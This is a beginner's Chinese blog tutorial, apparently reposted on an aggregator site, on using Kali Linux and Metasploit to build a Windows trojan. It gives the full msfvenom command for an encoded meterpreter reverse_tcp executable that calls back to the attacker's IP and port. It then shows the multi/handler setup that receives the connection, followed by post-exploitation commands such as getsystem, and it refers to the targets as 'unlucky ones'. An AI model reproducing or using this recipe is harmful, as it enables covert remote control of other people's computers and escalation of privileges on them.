-**

本人是個新手，寫寫筆記。 如果那里有錯誤或者語言不妥的地方。

請給予斧正！萬分感謝！

**

寫在最前面

網絡中的日新月異，時常會有更新，下面是針對msf和kali的更新方式
msf中有許多可用的攻擊載荷，如果不及時更新會導致對新系統漏洞的不了解
首先要更新kali：
經典三連

apt-get update apt-get upgrade & apt-get dist-upgrade 強行三連 apt-get clean

重啟一下就可以了 reboot 完成kali的整體更新

其次，單獨的對msf框架進行更新

msfupdate

以上就是kali的更新！

下面看完文章，會很好奇這個windows/meterpreter/reverse_tcp 這個是從哪里來的？
這個其實是msf框架中的針對windows的一個攻擊載荷
如何查看全部攻擊載荷或者篩選出我需要的載荷？

首先進入msfconsole

show -h 可以幫助你分類查找
輸入 show all 命令就可以查看所有的配置選項
再往下就是攻擊載荷
可以使用 show payload 命令之查看現在可用的
你可以找到文章中的windows/meterpreter/reverse_tcp這個payload
這里面有 windows linux還有安卓的等等，根據需要來使用

在這片文章的后面，也就是先使用msfvemon制作出木馬，在進入msfconsole的設置
如何判斷當前的也就是我們選中的攻擊載荷是否對目標操作系統具有有效的攻擊？
使用windows/meterpreter/reverse_tcp來舉例子
注意我紅框的位置，這里就是目標操作系統的范圍
怎么查看？
使用 show targets命令查看對那些操作系統有用

這里只有ID 0一個選項，要是有多個選項就是ID 0/ID 1 /ID 2這種格式
使用 set id 0/1/2 命令來選擇需要的操作系統

首先，我們要先知道木馬的使用過程，然后我們才能制作出木馬

• 木馬：控制端(我們)
• 被控制端(倒霉蛋們)
• 虛擬機的kali
• 打開終端
• 使用msfvenom -p命令來制作(因為我用的是kali2.0所以和1.0的版本不一樣)
• msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe > asd.exe
• 看不明白？不要慌！
• windows/meterpreter/reverse_tcp ->大體看出來這是windows下的tcp的一個漏洞(強大的Metaspoit自帶多種漏洞，需要什么自行百度就ok)
• -e x86/shikata_ga_nai ->這是編碼方式(我的windows7是64位的，所以要選擇對應的編碼格式。否則，生成可執行文件再打開時就會出現錯誤！)
• -i 5 ->編碼次數
• -b ->就是避免出現的值
• -f exe ->生成.exe的可執行文件
• asd.exe > 文件名.exe
• LHOST ->這是填寫自己本機的IP(因為這種木馬是用反彈機制)
• LPORT ->填寫自己的端口
• 回車運行！
• 我們可以看到，它生成一個434b的可執行文件
• 問題來了！生成的文件在哪里？
• 使用ls命令查看，生成在當前目錄下
• 然后，將生成文件復制到windows下
• 第二步
• 配置接收木馬上線的設置
• 打開Metaspoit
• 打開的命令為 msfconsole
• 我們就要開始輸入命令了
• msf > use exploit/multi/handler
• 我們使用handler模塊
• msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
• 打開handler模塊后，設置我們制作時用的木馬漏洞
• 這里就顯示設置成功
• 我們現在就要設置接收的IP和端口
• 輸入命令
• msf exploit(handler) > show options
• 顯示，我們需要填寫什么設置
• 大家還記得我們制作木馬時，填寫的ip和端口吧
• 一定要對應
• msf exploit(handler) > set LHOST 192.168.1.108
• 使用set來依次設置
• msf exploit(handler) > set LPORT 5555
• 成功設置后
• 最后一步！
• 輸入
• msf exploit(handler) > exploit
• 運行，等待木馬上線
• 我們在windows下雙擊運行
• 木馬上線成功！
• 接下來就可以進行系統操作和文件操作
• background 后臺運行
• sessions -i 查看后臺運行會話
• sessions -i ID號
• getsystem

總結

以上是生活随笔為你收集整理的kali-使用Metaspoit制作木马的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。